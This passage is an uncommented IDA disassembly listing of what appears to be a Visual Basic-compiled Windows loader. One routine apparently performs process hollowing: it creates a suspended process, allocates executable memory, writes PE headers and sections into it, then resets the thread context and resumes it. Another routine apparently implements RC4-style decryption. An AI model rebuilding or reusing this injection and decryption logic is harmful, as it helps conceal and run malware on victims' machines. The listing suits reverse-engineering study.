cmp word ptr [ecx], 1
jnz short loc_402166
mov eax, dword_40405C
mov edx, [ecx+14h]
sub eax, edx
mov edx, [ecx+10h]
cmp eax, edx
mov [ebp+var_88], eax
jb short loc_40216F
call ds:dword_401064
mov ecx, [ebp+var_2C]
mov eax, [ebp+var_88]
jmp short loc_40216F
; ---------------------------------------------------------------------------
loc_402166: ; CODE XREF: sub_401EE0+256�j
; sub_401EE0+25C�j
call ds:dword_401064
mov ecx, [ebp+var_2C]
loc_40216F: ; CODE XREF: sub_401EE0+273�j
; sub_401EE0+284�j
mov edx, [ecx+0Ch]
push 0F8h
add edx, eax
push edx
push offset dword_404060
call sub_4018D8
call ds:dword_40102C
lea eax, [ebp+var_2C]
push eax
call ebx
mov cx, word_404066
push 0
sub cx, 1
jo loc_402652
movsx edx, cx
push edx
push 1
push 0
push offset dword_404158
push 28h
push 0
call edi
mov ax, word_404066
add esp, 1Ch
sub ax, 1
jo loc_402652
mov [ebp+var_A0], eax
xor edi, edi
loc_4021D1: ; CODE XREF: sub_401EE0+3F4�j
cmp di, ax
jg loc_4022D9
mov eax, [ebp+var_28]
lea ecx, [ebp+var_30]
push eax
push ecx
call esi
mov eax, [ebp+var_30]
test eax, eax
jz short loc_40223B
cmp word ptr [eax], 1
jnz short loc_40223B
mov dx, di
mov ecx, dword_40405C
imul dx, 28h
jo loc_402652
movsx esi, dx
mov edx, [eax+14h]
add ecx, 0F8h
jo loc_402652
add esi, ecx
mov ecx, [eax+10h]
jo loc_402652
sub esi, edx
cmp esi, ecx
jb short loc_40222D
call ds:dword_401064
loc_40222D: ; CODE XREF: sub_401EE0+345�j
mov [ebp+var_A8], esi
mov esi, ds:dword_4010DC
jmp short loc_402247
; ---------------------------------------------------------------------------
loc_40223B: ; CODE XREF: sub_401EE0+309�j
; sub_401EE0+30F�j
call ds:dword_401064
mov [ebp+var_A8], eax
loc_402247: ; CODE XREF: sub_401EE0+359�j
mov edx, dword_404158
lea eax, [ebp+var_2C]
push edx
push eax
call esi
mov ecx, [ebp+var_2C]
test ecx, ecx
jz short loc_402281
cmp word ptr [ecx], 1
jnz short loc_402281
mov edx, [ecx+14h]
mov eax, [ecx+10h]
movsx esi, di
sub esi, edx
cmp esi, eax
jb short loc_402279
call ds:dword_401064
mov ecx, [ebp+var_2C]
loc_402279: ; CODE XREF: sub_401EE0+38E�j
lea eax, [esi+esi*4]
shl eax, 3
jmp short loc_40228A
; ---------------------------------------------------------------------------
loc_402281: ; CODE XREF: sub_401EE0+379�j
; sub_401EE0+37F�j
call ds:dword_401064
mov ecx, [ebp+var_2C]
loc_40228A: ; CODE XREF: sub_401EE0+39F�j
mov edx, [ebp+var_30]
mov esi, [ebp+var_A8]
mov ecx, [ecx+0Ch]
push 28h
mov edx, [edx+0Ch]
add ecx, eax
add edx, esi
push edx
push ecx
call sub_4018D8
call ds:dword_40102C
lea edx, [ebp+var_2C]
push edx
call ebx
lea eax, [ebp+var_30]
push eax
call ebx
mov esi, ds:dword_4010DC
mov eax, 1
add ax, di
jo loc_402652
mov edi, eax
mov eax, [ebp+var_A0]
jmp loc_4021D1
; ---------------------------------------------------------------------------
loc_4022D9: ; CODE XREF: sub_401EE0+2F4�j
push 0
lea edx, [ebp+var_6C]
push 40h
lea eax, [ebp+var_48]
lea ecx, [ebp+var_28]
push edx
push eax
mov [ebp+var_64], ecx
mov [ebp+var_6C], 6011h
call ds:dword_40109C
mov ebx, ds:dword_401010
lea ecx, [ebp+var_48]
push ecx
call ebx
mov edx, eax
lea ecx, [ebp+var_24]
call ds:dword_4010F0
lea ecx, [ebp+var_48]
call ds:dword_40100C
mov ecx, dword_404158
mov [ebp+var_40], 0Fh
test ecx, ecx
mov [ebp+var_48], 2
jz short loc_402372
cmp word ptr [ecx], 1
jnz short loc_402372
mov ax, word_404066
mov edi, [ecx+14h]
mov dx, ax
sub dx, 1
jo loc_402652
movsx esi, dx
mov edx, [ecx+10h]
sub esi, edi
cmp esi, edx
jb short loc_40236A
call ds:dword_401064
mov ecx, dword_404158
mov ax, word_404066
loc_40236A: ; CODE XREF: sub_401EE0+476�j
lea edi, [esi+esi*4]
shl edi, 3
jmp short loc_402386
; ---------------------------------------------------------------------------
loc_402372: ; CODE XREF: sub_401EE0+44E�j
; sub_401EE0+454�j
call ds:dword_401064
mov ecx, dword_404158
mov edi, eax
mov ax, word_404066
loc_402386: ; CODE XREF: sub_401EE0+490�j
test ecx, ecx
jz short loc_4023BD
cmp word ptr [ecx], 1
jnz short loc_4023BD
mov edx, [ecx+14h]
sub ax, 1
jo loc_402652
movsx esi, ax
mov eax, [ecx+10h]
sub esi, edx
cmp esi, eax
jb short loc_4023B5
call ds:dword_401064
mov ecx, dword_404158
loc_4023B5: ; CODE XREF: sub_401EE0+4C7�j
lea eax, [esi+esi*4]
shl eax, 3
jmp short loc_4023C9
; ---------------------------------------------------------------------------
loc_4023BD: ; CODE XREF: sub_401EE0+4A8�j
; sub_401EE0+4AE�j
call ds:dword_401064
mov ecx, dword_404158
loc_4023C9: ; CODE XREF: sub_401EE0+4DB�j
lea edx, [ebp+var_24]
mov [ebp+var_6C], 4008h
mov [ebp+var_64], edx
mov ecx, [ecx+0Ch]
lea edx, [ebp+var_48]
mov eax, [ecx+eax+10h]
mov esi, [ecx+edi+14h]
add eax, esi
push edx
jo loc_402652
add eax, 1
lea ecx, [ebp+var_6C]
jo loc_402652
push eax
lea edx, [ebp+var_58]
push ecx
push edx
call ds:dword_401054
lea eax, [ebp+var_58]
push eax
call ebx
mov edx, eax
lea ecx, [ebp+var_20]
call ds:dword_4010F0
mov edi, ds:dword_40101C
lea ecx, [ebp+var_58]
lea edx, [ebp+var_48]
push ecx
push edx
push 2
call edi
mov eax, [ebp+var_24]
add esp, 0Ch
push eax
call ds:dword_401014
mov [ebp+var_40], eax
mov eax, dword_404158
test eax, eax
mov [ebp+var_48], 3
jz short loc_402491
cmp word ptr [eax], 1
jnz short loc_402491
mov cx, word_404066
mov ebx, [eax+14h]
mov dx, cx
sub dx, 1
jo loc_402652
movsx esi, dx
mov edx, [eax+10h]
sub esi, ebx
cmp esi, edx
jb short loc_402483
call ds:dword_401064
mov eax, dword_404158
mov cx, word_404066
loc_402483: ; CODE XREF: sub_401EE0+58F�j
lea esi, [esi+esi*4]
shl esi, 3
mov [ebp+var_AC], esi
jmp short loc_4024A9
; ---------------------------------------------------------------------------
loc_402491: ; CODE XREF: sub_401EE0+566�j
; sub_401EE0+56C�j
call ds:dword_401064
mov cx, word_404066
mov [ebp+var_AC], eax
mov eax, dword_404158
loc_4024A9: ; CODE XREF: sub_401EE0+5AF�j
test eax, eax
jz short loc_4024DF
cmp word ptr [eax], 1
jnz short loc_4024DF
mov edx, [eax+14h]
sub cx, 1
jo loc_402652
movsx esi, cx
mov ecx, [eax+10h]
sub esi, edx
cmp esi, ecx
jb short loc_4024D7
call ds:dword_401064
mov eax, dword_404158
loc_4024D7: ; CODE XREF: sub_401EE0+5EA�j
lea ebx, [esi+esi*4]
shl ebx, 3
jmp short loc_4024EC
; ---------------------------------------------------------------------------
loc_4024DF: ; CODE XREF: sub_401EE0+5CB�j
; sub_401EE0+5D1�j
call ds:dword_401064
mov ebx, eax
mov eax, dword_404158
loc_4024EC: ; CODE XREF: sub_401EE0+5FD�j
lea ecx, [ebp+var_24]
mov [ebp+var_6C], 4008h
mov [ebp+var_64], ecx
mov esi, [eax+0Ch]
mov eax, [ebp+var_20]
lea edx, [ebp+var_48]
push edx
push eax
call ds:dword_401014
mov edx, [ebp+var_AC]
mov ecx, [esi+ebx+10h]
add ecx, [esi+edx+14h]
jo loc_402652
add eax, ecx
lea ecx, [ebp+var_58]
jo loc_402652
add eax, 1
jo loc_402652
push eax
lea eax, [ebp+var_6C]
push eax
push ecx
call ds:dword_401054
lea edx, [ebp+var_58]
push edx
call ds:dword_401010
mov esi, ds:dword_4010F0
mov edx, eax
lea ecx, [ebp+var_24]
call esi
lea eax, [ebp+var_58]
lea ecx, [ebp+var_48]
push eax
push ecx
push 2
call edi
mov edx, [ebp+var_20]
mov eax, [ebp+var_24]
add esp, 0Ch
push edx
push eax
call loc_402D30
mov edx, eax
lea ecx, [ebp+var_24]
call esi
push 0
lea edx, [ebp+var_6C]
push 80h
lea eax, [ebp+var_48]
lea ecx, [ebp+var_24]
push edx
push eax
mov [ebp+var_64], ecx
mov [ebp+var_6C], 4008h
call ds:dword_40109C
lea ecx, [ebp+var_48]
lea edx, [ebp+var_5C]
push ecx
push edx
call ds:dword_4010C0
mov ecx, [ebp+var_1C]
lea eax, [ebp+var_5C]
push eax
lea edx, [ebp+var_58]
push ecx
push edx
call sub_402660
lea eax, [ebp+var_5C]
push eax
push 0
call ds:dword_401050
lea ecx, [ebp+var_58]
lea edx, [ebp+var_48]
push ecx
push edx
push 2
call edi
add esp, 0Ch
push offset loc_402641
jmp short loc_40261F
; ---------------------------------------------------------------------------
loc_4025DB: ; DATA XREF: .text:0040111C�o
mov esi, ds:dword_4010FC
lea eax, [ebp+var_2C]
push eax
call esi
lea ecx, [ebp+var_30]
push ecx
call esi
lea ecx, [ebp+var_34]
call ds:dword_401108
lea ecx, [ebp+var_38]
call ds:dword_401104
lea edx, [ebp+var_58]
lea eax, [ebp+var_48]
push edx
push eax
push 2
call ds:dword_40101C
add esp, 0Ch
lea ecx, [ebp+var_5C]
push ecx
push 0
call ds:dword_40103C
retn
; ---------------------------------------------------------------------------
loc_40261F: ; CODE XREF: sub_401EE0+6F9�j
; DATA XREF: .text:00401118�o
mov esi, ds:dword_401108
lea ecx, [ebp+var_1C]
call esi
lea ecx, [ebp+var_20]
call esi
lea ecx, [ebp+var_24]
call esi
lea edx, [ebp+var_28]
push edx
push 0
call ds:dword_40103C
retn
; ---------------------------------------------------------------------------
loc_402641: ; DATA XREF: sub_401EE0+6F4�o
mov ecx, [ebp+var_10]
pop edi
pop esi
mov large fs:0, ecx
pop ebx
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
loc_402652: ; CODE XREF: sub_401EE0+1B2�j
; sub_401EE0+2BD�j ...
call ds:dword_4010AC
nop
nop
nop
nop
nop
nop
nop
nop
sub_401EE0 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402660 proc near ; CODE XREF: sub_401EE0+6D4�p
var_1CC = dword ptr -1CCh
var_1C0 = dword ptr -1C0h
var_1B8 = byte ptr -1B8h
var_164 = dword ptr -164h
var_160 = dword ptr -160h
var_15C = dword ptr -15Ch
var_158 = dword ptr -158h
var_154 = dword ptr -154h
var_150 = dword ptr -150h
var_14C = dword ptr -14Ch
var_148 = dword ptr -148h
var_144 = dword ptr -144h
var_140 = dword ptr -140h
var_13C = dword ptr -13Ch
var_138 = dword ptr -138h
var_134 = dword ptr -134h
var_130 = dword ptr -130h
var_12C = dword ptr -12Ch
var_128 = dword ptr -128h
var_E4 = dword ptr -0E4h
var_40 = dword ptr -40h
var_34 = dword ptr -34h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 0Ch
push offset loc_401146
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 1B8h
push ebx
push esi
push edi
mov [ebp+var_C], esp
mov [ebp+var_8], offset dword_401120
mov ecx, 33h
xor eax, eax
lea edi, [ebp+var_E4]
mov edx, [ebp+arg_4]
rep stosd
mov ecx, 11h
lea edi, [ebp+var_128]
rep stosd
mov [ebp+var_13C], eax
mov ecx, 11h
mov [ebp+var_138], eax
lea edi, [ebp+var_1B8]
mov [ebp+var_134], eax
xor esi, esi
rep stosd
lea ecx, [ebp+var_140]
mov [ebp+var_18], esi
mov [ebp+var_130], eax
mov [ebp+var_140], esi
mov [ebp+var_150], esi
mov [ebp+var_154], esi
mov [ebp+var_158], esi
mov [ebp+var_15C], esi
mov [ebp+var_160], esi
mov [ebp+var_164], esi
call ds:dword_4010CC
lea ecx, [ebp+var_13C]
lea edx, [ebp+var_128]
push ecx
lea eax, [ebp+var_1B8]
push edx
push eax
push offset dword_401814
mov [ebp+var_128], 44h
call ds:dword_40107C
mov ecx, [ebp+var_140]
push eax
push esi
push esi
push 4
push esi
push esi
push esi
lea edx, [ebp+var_164]
push ecx
push edx
call ds:dword_4010E0
push eax
push esi
call sub_401920
mov ebx, ds:dword_40102C
call ebx
lea eax, [ebp+var_1B8]
lea ecx, [ebp+var_128]
push eax
push ecx
push offset dword_401814
call ds:dword_401028
mov edx, [ebp+var_164]
lea eax, [ebp+var_140]
push edx
push eax
call ds:dword_40108C
lea ecx, [ebp+var_164]
call ds:dword_401108
lea ecx, [ebp+var_1B8]
push ecx
push offset dword_401814
call ds:dword_4010E8
mov eax, [ebp+var_138]
lea edx, [ebp+var_E4]
push edx
push eax
mov [ebp+var_E4], 10007h
call sub_401AA8
call ebx
mov eax, [ebp+var_40]
lea ecx, [ebp+var_158]
push ecx
mov ecx, [ebp+var_13C]
lea edx, [ebp+var_154]
add eax, 8
push 4
push edx
jo loc_402D29
push eax
push ecx
call sub_40196C
call ebx
mov edx, [ebp+var_154]
mov eax, [ebp+var_13C]
push edx
push eax
call sub_401A5C
call ebx
mov ecx, [ebp+arg_8]
lea eax, [ebp+var_15C]
mov edx, [ecx]
push edx
push eax
call ds:dword_4010DC
mov ecx, [ebp+var_15C]
cmp ecx, esi
jz short loc_40284B
cmp word ptr [ecx], 1
jnz short loc_40284B
mov esi, [ecx+14h]
mov eax, [ecx+10h]
neg esi
cmp esi, eax
jb short loc_402845
call ds:dword_401064
mov ecx, [ebp+var_15C]
loc_402845: ; CODE XREF: sub_402660+1D7�j
mov eax, esi
xor esi, esi
jmp short loc_402857
; ---------------------------------------------------------------------------
loc_40284B: ; CODE XREF: sub_402660+1C5�j
; sub_402660+1CB�j
call ds:dword_401064
mov ecx, [ebp+var_15C]
loc_402857: ; CODE XREF: sub_402660+1E9�j
mov ecx, [ecx+0Ch]
push 40h
add ecx, eax
push ecx
push offset dword_404020
call sub_4018D8
call ebx
mov edi, ds:dword_4010FC
lea edx, [ebp+var_15C]
push edx
call edi
mov eax, [ebp+arg_8]
lea edx, [ebp+var_15C]
mov ecx, [eax]
push ecx
push edx
call ds:dword_4010DC
mov ecx, [ebp+var_15C]
cmp ecx, esi
jz short loc_4028C1
cmp word ptr [ecx], 1
jnz short loc_4028C1
mov esi, dword_40405C
mov edx, [ecx+14h]
mov eax, [ecx+10h]
sub esi, edx
cmp esi, eax
jb short loc_4028BB
call ds:dword_401064
mov ecx, [ebp+var_15C]
loc_4028BB: ; CODE XREF: sub_402660+24D�j
mov eax, esi
xor esi, esi
jmp short loc_4028CD
; ---------------------------------------------------------------------------
loc_4028C1: ; CODE XREF: sub_402660+235�j
; sub_402660+23B�j
call ds:dword_401064
mov ecx, [ebp+var_15C]
loc_4028CD: ; CODE XREF: sub_402660+25F�j
mov ecx, [ecx+0Ch]
push 0F8h
add ecx, eax
push ecx
push offset dword_404060
call sub_4018D8
call ebx
lea edx, [ebp+var_15C]
push edx
call edi
mov eax, dword_4040B0
mov ecx, dword_404094
mov edx, [ebp+var_13C]
push 40h
push 3000h
push eax
push ecx
push edx
call sub_401A00
call ebx
mov eax, [ebp+arg_8]
lea edx, [ebp+var_15C]
mov ecx, [eax]
push ecx
push edx
call ds:dword_4010DC
mov ecx, [ebp+var_15C]
cmp ecx, esi
jz short loc_402950
cmp word ptr [ecx], 1
jnz short loc_402950
mov esi, [ecx+14h]
mov eax, [ecx+10h]
neg esi
cmp esi, eax
jb short loc_40294A
call ds:dword_401064
mov ecx, [ebp+var_15C]
loc_40294A: ; CODE XREF: sub_402660+2DC�j
mov eax, esi
xor esi, esi
jmp short loc_40295C
; ---------------------------------------------------------------------------
loc_402950: ; CODE XREF: sub_402660+2CA�j
; sub_402660+2D0�j
call ds:dword_401064
mov ecx, [ebp+var_15C]
loc_40295C: ; CODE XREF: sub_402660+2EE�j
mov ecx, [ecx+0Ch]
lea edx, [ebp+var_18]
push edx
mov edx, dword_4040B4
push edx
mov edx, [ebp+var_154]
add ecx, eax
mov eax, [ebp+var_13C]
push ecx
push edx
push eax
call sub_4019B8
call ebx
lea ecx, [ebp+var_15C]
push ecx
call edi
mov dx, word_404066
sub dx, 1
jo loc_402D29
movsx eax, dx
xor edi, edi
mov [ebp+var_1C0], eax
mov [ebp+var_12C], edi
loc_4029AD: ; CODE XREF: sub_402660+5B8�j
cmp edi, [ebp+var_1C0]
jg loc_402C1D
mov ecx, [ebp+arg_8]
lea eax, [ebp+var_160]
mov edx, [ecx]
push edx
push eax
call ds:dword_4010DC
mov eax, [ebp+var_160]
cmp eax, esi
jz short loc_402A15
cmp word ptr [eax], 1
jnz short loc_402A15
mov esi, dword_40405C
mov ecx, edi
add esi, 0F8h
mov edx, [eax+14h]
jo loc_402D29
imul ecx, 28h
jo loc_402D29
add esi, ecx
mov ecx, [eax+10h]
jo loc_402D29
sub esi, edx
cmp esi, ecx
jb short loc_402A1D
call ds:dword_401064
jmp short loc_402A1D
; ---------------------------------------------------------------------------
loc_402A15: ; CODE XREF: sub_402660+374�j
; sub_402660+37A�j
call ds:dword_401064
mov esi, eax
loc_402A1D: ; CODE XREF: sub_402660+3AB�j
; sub_402660+3B3�j
mov edx, dword_404158
lea eax, [ebp+var_15C]
push edx
push eax
call ds:dword_4010DC
mov ecx, [ebp+var_15C]
test ecx, ecx
jz short loc_402A67
cmp word ptr [ecx], 1
jnz short loc_402A67
mov edx, [ecx+14h]
mov eax, [ecx+10h]
sub edi, edx
cmp edi, eax
jb short loc_402A59
call ds:dword_401064
mov ecx, [ebp+var_15C]
loc_402A59: ; CODE XREF: sub_402660+3EB�j
lea eax, [edi+edi*4]
mov edi, [ebp+var_12C]
shl eax, 3
jmp short loc_402A73
; ---------------------------------------------------------------------------
loc_402A67: ; CODE XREF: sub_402660+3D9�j
; sub_402660+3DF�j
call ds:dword_401064
mov ecx, [ebp+var_15C]
loc_402A73: ; CODE XREF: sub_402660+405�j
mov edx, [ebp+var_160]
mov ecx, [ecx+0Ch]
push 28h
add ecx, eax
mov edx, [edx+0Ch]
add edx, esi
push edx
push ecx
call sub_4018D8
call ebx
mov esi, ds:dword_4010FC
lea edx, [ebp+var_15C]
push edx
call esi
lea eax, [ebp+var_160]
push eax
call esi
mov eax, dword_404158
test eax, eax
jz short loc_402ADD
cmp word ptr [eax], 1
jnz short loc_402ADD
mov edx, [eax+14h]
mov ecx, [eax+10h]
mov esi, edi
sub esi, edx
cmp esi, ecx
jb short loc_402AC9
call ds:dword_401064
loc_402AC9: ; CODE XREF: sub_402660+461�j
lea esi, [esi+esi*4]
shl esi, 3
mov [ebp+var_1CC], esi
mov esi, ds:dword_401064
jmp short loc_402AEB
; ---------------------------------------------------------------------------
loc_402ADD: ; CODE XREF: sub_402660+44D�j
; sub_402660+453�j
mov esi, ds:dword_401064
call esi
mov [ebp+var_1CC], eax
loc_402AEB: ; CODE XREF: sub_402660+47B�j
mov ecx, [ebp+arg_8]
lea eax, [ebp+var_15C]
mov edx, [ecx]
push edx
push eax
call ds:dword_4010DC
mov edx, [ebp+var_15C]
test edx, edx
jz short loc_402B6F
cmp word ptr [edx], 1
jnz short loc_402B6F
mov ecx, dword_404158
test ecx, ecx
jz short loc_402B46
cmp word ptr [ecx], 1
jnz short loc_402B46
mov eax, [ecx+14h]
mov esi, edi
sub esi, eax
mov eax, [ecx+10h]
cmp esi, eax
jb short loc_402B3E
call ds:dword_401064
mov edx, [ebp+var_15C]
mov ecx, dword_404158
loc_402B3E: ; CODE XREF: sub_402660+4CA�j
lea eax, [esi+esi*4]
shl eax, 3
jmp short loc_402B54
; ---------------------------------------------------------------------------
loc_402B46: ; CODE XREF: sub_402660+4B6�j
; sub_402660+4BC�j
call esi
mov edx, [ebp+var_15C]
mov ecx, dword_404158
loc_402B54: ; CODE XREF: sub_402660+4E4�j
mov esi, [ecx+0Ch]
mov esi, [esi+eax+14h]
mov eax, [edx+14h]
sub esi, eax
mov eax, [edx+10h]
cmp esi, eax
jb short loc_402B79
call ds:dword_401064
jmp short loc_402B73
; ---------------------------------------------------------------------------
loc_402B6F: ; CODE XREF: sub_402660+4A6�j
; sub_402660+4AC�j
call esi
mov esi, eax
loc_402B73: ; CODE XREF: sub_402660+50D�j
mov ecx, dword_404158
loc_402B79: ; CODE XREF: sub_402660+505�j
test ecx, ecx
jz short loc_402BA9
cmp word ptr [ecx], 1
jnz short loc_402BA9
mov edx, [ecx+14h]
mov eax, [ecx+10h]
sub edi, edx
cmp edi, eax
jb short loc_402B9B
call ds:dword_401064
mov ecx, dword_404158
loc_402B9B: ; CODE XREF: sub_402660+52D�j
lea eax, [edi+edi*4]
mov edi, [ebp+var_12C]
shl eax, 3
jmp short loc_402BB5
; ---------------------------------------------------------------------------
loc_402BA9: ; CODE XREF: sub_402660+51B�j
; sub_402660+521�j
call ds:dword_401064
mov ecx, dword_404158
loc_402BB5: ; CODE XREF: sub_402660+547�j
mov ecx, [ecx+0Ch]
lea edx, [ebp+var_18]
push edx
mov edx, [ebp+var_1CC]
mov eax, [ecx+eax+0Ch]
mov edx, [ecx+edx+10h]
mov ecx, [ebp+var_13C]
push edx
mov edx, [ebp+var_15C]
mov edx, [edx+0Ch]
add edx, esi
push edx
mov edx, [ebp+var_154]
add eax, edx
jo loc_402D29
push eax
push ecx
call sub_4019B8
call ebx
lea edx, [ebp+var_15C]
push edx
call ds:dword_4010FC
mov eax, 1
add eax, edi
jo loc_402D29
mov [ebp+var_12C], eax
mov edi, eax
xor esi, esi
jmp loc_4029AD
; ---------------------------------------------------------------------------
loc_402C1D: ; CODE XREF: sub_402660+353�j
mov edx, [ebp+var_40]
lea eax, [ebp+var_18]
push eax
mov eax, [ebp+var_13C]
lea ecx, [ebp+var_154]
add edx, 8
push 4
push ecx
jo loc_402D29
push edx
push eax
call sub_4019B8
call ebx
mov ecx, dword_404088
mov eax, [ebp+var_154]
add ecx, eax
mov eax, [ebp+var_138]
lea edx, [ebp+var_E4]
push edx
push eax
jo loc_402D29
mov [ebp+var_34], ecx
call sub_401AF4
call ebx
mov ecx, [ebp+var_138]
push ecx
call sub_401B3C
call ebx
push offset loc_402CEE
jmp short loc_402CBD
; ---------------------------------------------------------------------------
loc_402C86: ; DATA XREF: .text:0040112C�o
test [ebp+var_4], 4
jz short loc_402C98
lea ecx, [ebp+var_150]
call ds:dword_40100C
loc_402C98: ; CODE XREF: sub_402660+62A�j
mov esi, ds:dword_4010FC
lea edx, [ebp+var_15C]
push edx
call esi
lea eax, [ebp+var_160]
push eax
call esi
lea ecx, [ebp+var_164]
call ds:dword_401108
retn
; ---------------------------------------------------------------------------
loc_402CBD: ; CODE XREF: sub_402660+624�j
; DATA XREF: .text:00401128�o
lea ecx, [ebp+var_1B8]
push ecx
push offset dword_401814
call ds:dword_4010E8
lea edx, [ebp+var_128]
push edx
push offset dword_401814
call ds:dword_401030
lea ecx, [ebp+var_140]
call ds:dword_401108
retn
; ---------------------------------------------------------------------------
loc_402CEE: ; DATA XREF: sub_402660+61F�o
mov eax, [ebp+arg_0]
mov edx, [ebp+var_150]
mov ecx, eax
pop edi
pop esi
pop ebx
mov [ecx], edx
mov edx, [ebp+var_14C]
mov [ecx+4], edx
mov edx, [ebp+var_148]
mov [ecx+8], edx
mov edx, [ebp+var_144]
mov [ecx+0Ch], edx
mov ecx, [ebp+var_14]
mov large fs:0, ecx
mov esp, ebp
pop ebp
retn 0Ch
; ---------------------------------------------------------------------------
loc_402D29: ; CODE XREF: sub_402660+186�j
; sub_402660+336�j ...
call ds:dword_4010AC
nop
sub_402660 endp ; sp-analysis failed
loc_402D30: ; CODE XREF: sub_401EE0+68C�p
push ebp
mov ebp, esp
sub esp, 0Ch
push offset loc_401146
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 0A4h
push ebx
push esi
push edi
mov [ebp-0Ch], esp
mov dword ptr [ebp-8], offset dword_401130
mov edx, [ebp+8]
mov esi, ds:dword_4010CC
xor edi, edi
lea ecx, [ebp-30h]
mov [ebp-28h], edi
mov [ebp-2Ch], edi
mov [ebp-30h], edi
mov [ebp-54h], edi
mov [ebp-58h], edi
mov [ebp-68h], edi
mov [ebp-6Ch], edi
mov [ebp-7Ch], edi
mov [ebp-80h], edi
call esi
mov edx, [ebp+0Ch]
lea ecx, [ebp-2Ch]
call esi
push 2
lea eax, [ebp-48h]
push offset dword_401E38
push eax
call ds:dword_401068
mov ecx, [ebp-2Ch]
push ecx
call ds:dword_401014
mov [ebp-1Ch], eax
push edi
lea eax, [ebp-7Ch]
push 80h
lea ecx, [ebp-68h]
lea edx, [ebp-30h]
push eax
push ecx
mov [ebp-74h], edx
mov dword ptr [ebp-7Ch], 4008h
call ds:dword_40109C
mov esi, ds:dword_4010C0
lea edx, [ebp-68h]
lea eax, [ebp-6Ch]
push edx
push eax
call esi
mov ebx, ds:dword_401008
lea ecx, [ebp-6Ch]
lea edx, [ebp-58h]
push ecx
push edx
call ebx
lea ecx, [ebp-68h]
call ds:dword_40100C
push edi
lea ecx, [ebp-7Ch]
push 80h
lea edx, [ebp-68h]
lea eax, [ebp-2Ch]
push ecx
push edx
mov [ebp-74h], eax
mov dword ptr [ebp-7Ch], 4008h
call ds:dword_40109C
lea eax, [ebp-68h]
lea ecx, [ebp-6Ch]
push eax
push ecx
call esi
lea edx, [ebp-6Ch]
lea eax, [ebp-28h]
push edx
push eax
call ebx
lea ecx, [ebp-68h]
call ds:dword_40100C
mov ebx, 1
xor esi, esi
loc_402E3C: ; CODE XREF: .text:00402E74�j
mov eax, 0FFh
cmp esi, eax
jg short loc_402E76
call ds:dword_401048
cmp esi, 100h
jb short loc_402E59
call ds:dword_401064
loc_402E59: ; CODE XREF: .text:00402E51�j
mov ecx, esi
call ds:dword_40106C
mov ecx, [ebp-3Ch]
mov edx, ebx
add edx, esi
mov [ecx+esi*2], ax
jo loc_403205
mov esi, edx
jmp short loc_402E3C
; ---------------------------------------------------------------------------
loc_402E76: ; CODE XREF: .text:00402E43�j
mov dword ptr [ebp-0A4h], 0FFh
xor esi, esi
loc_402E82: ; CODE XREF: .text:00402F77�j
cmp esi, [ebp-0A4h]
jg loc_402F7C
call ds:dword_401048
cmp esi, 100h
jb short loc_402EA2
call ds:dword_401064
loc_402EA2: ; CODE XREF: .text:00402E9A�j
mov ecx, [ebp-28h]
test ecx, ecx
jz short loc_402ED0
cmp word ptr [ecx], 1
jnz short loc_402ED0
mov eax, esi
cdq
idiv dword ptr [ebp-1Ch]
mov eax, [ecx+10h]
mov ebx, edx
mov edx, [ecx+14h]
sub ebx, edx
cmp ebx, eax
jb short loc_402ECC
call ds:dword_401064
mov ecx, [ebp-28h]
loc_402ECC: ; CODE XREF: .text:00402EC1�j
mov eax, ebx
jmp short loc_402ED9
; ---------------------------------------------------------------------------
loc_402ED0: ; CODE XREF: .text:00402EA7�j
; .text:00402EAD�j
call ds:dword_401064
mov ecx, [ebp-28h]
loc_402ED9: ; CODE XREF: .text:00402ECE�j
mov edx, [ebp-3Ch]
mov ecx, [ecx+0Ch]
movsx edx, word ptr [edx+esi*2]
add edx, edi
jo loc_403205
xor ebx, ebx
mov bl, [ecx+eax]
add edx, ebx
jo loc_403205
mov edi, edx
and edi, 800000FFh
jns short loc_402F0A
dec edi
or edi, 0FFFFFF00h
inc edi
loc_402F0A: ; CODE XREF: .text:00402F00�j
cmp esi, 100h
jb short loc_402F18
call ds:dword_401064
loc_402F18: ; CODE XREF: .text:00402F10�j
mov edx, [ebp-3Ch]
mov cx, [edx+esi*2]
call ds:dword_401080
cmp edi, 100h
mov bl, al
jb short loc_402F35
call ds:dword_401064
loc_402F35: ; CODE XREF: .text:00402F2D�j
cmp esi, 100h
jb short loc_402F43
call ds:dword_401064
loc_402F43: ; CODE XREF: .text:00402F3B�j
mov eax, [ebp-3Ch]
cmp edi, 100h
mov cx, [eax+edi*2]
mov [eax+esi*2], cx
jb short loc_402F5C
call ds:dword_401064
loc_402F5C: ; CODE XREF: .text:00402F54�j
mov eax, [ebp-3Ch]
xor dx, dx
mov dl, bl
mov [eax+edi*2], dx
mov eax, 1
add eax, esi
jo loc_403205
mov esi, eax
jmp loc_402E82
; ---------------------------------------------------------------------------
loc_402F7C: ; CODE XREF: .text:00402E88�j
mov ecx, [ebp-58h]
push ecx
push 1
call ds:dword_4010A0
mov [ebp-0ACh], eax
mov dword ptr [ebp-18h], 0
loc_402F95: ; CODE XREF: .text:0040314C�j
mov edx, [ebp-0ACh]
mov eax, [ebp-18h]
cmp eax, edx
jg loc_403151
call ds:dword_401048
add esi, 1
jo loc_403205
and esi, 800000FFh
jns short loc_402FC5
dec esi
or esi, 0FFFFFF00h
inc esi
loc_402FC5: ; CODE XREF: .text:00402FBB�j
cmp esi, 100h
jb short loc_402FD3
call ds:dword_401064
loc_402FD3: ; CODE XREF: .text:00402FCB�j
mov eax, [ebp-3Ch]
movsx ecx, word ptr [eax+esi*2]
add ecx, edi
jo loc_403205
mov edi, ecx
and edi, 800000FFh
jns short loc_402FF4
dec edi
or edi, 0FFFFFF00h
inc edi
loc_402FF4: ; CODE XREF: .text:00402FEA�j
cmp esi, 100h
jb short loc_403002
call ds:dword_401064
loc_403002: ; CODE XREF: .text:00402FFA�j
mov edx, [ebp-3Ch]
mov cx, [edx+esi*2]
call ds:dword_401080
cmp edi, 100h
mov bl, al
jb short loc_40301F
call ds:dword_401064
loc_40301F: ; CODE XREF: .text:00403017�j
cmp esi, 100h
jb short loc_40302D
call ds:dword_401064
